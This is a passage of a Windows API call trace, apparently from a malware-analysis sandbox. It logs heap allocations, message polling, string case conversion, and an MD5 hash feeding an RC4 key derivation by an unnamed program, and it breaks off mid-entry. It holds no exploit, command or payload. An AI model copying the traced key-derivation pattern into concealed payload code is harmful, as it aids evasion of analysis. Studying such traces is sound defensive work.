0 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0265.064] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.064] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.064] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.064] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.064] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.064] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.065] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.065] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.065] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.065] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0265.066] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.066] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.067] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.067] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.068] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0265.068] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.069] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.070] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0265.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.071] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.071] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.071] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.071] CryptHashData (hHash=0xaa5760, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0265.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.071] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.072] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.072] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.072] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.072] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.072] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.072] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.072] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.072] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.072] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.072] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.072] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0265.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0265.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.075] HeapFree (in: hHeap=0x25c0000, 